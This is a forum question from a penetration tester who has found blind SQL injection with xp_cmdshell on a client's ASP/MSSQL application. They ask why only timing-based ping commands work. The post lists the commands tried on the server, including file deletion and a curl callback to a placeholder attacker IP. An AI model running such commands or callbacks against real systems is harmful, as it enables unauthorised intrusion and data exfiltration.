xp_cmdshell as dbo user only able to run ‘ping localhost’ to verify RCE?

Çağlar Arlı

I am doing a pentest on a client's ASP web application and I have identified a blind SQL injection. However, after enabling xp_cmdshell, I am only able to run the ping localhost command to verify the RCE, which has a 3-second delay. I also tried to run ping -n 10 localhost and it has a ~10s delay as well.

I am fairly certain that there is an RCE here but I can't seem to run other commands such as:

  • mkdir C:\Windows\Temp\pwned
  • mkdir C:\inetpub\wwwroot\pwned
  • del C:\Windows\Temp\randomFile
  • move C:\Windows\Temp\randomFile C:\Windows\Temp\randomFile2
  • curl http://attackerIP:80 (blocked by firewall)

I also managed to extract the username using the SELECT CURRENT_USER; command using the blind SQL vulnerability and it is dbo. The database version is MSSQL 2006.

What are some possible reasons that I am only able to run the ping localhost command and not others?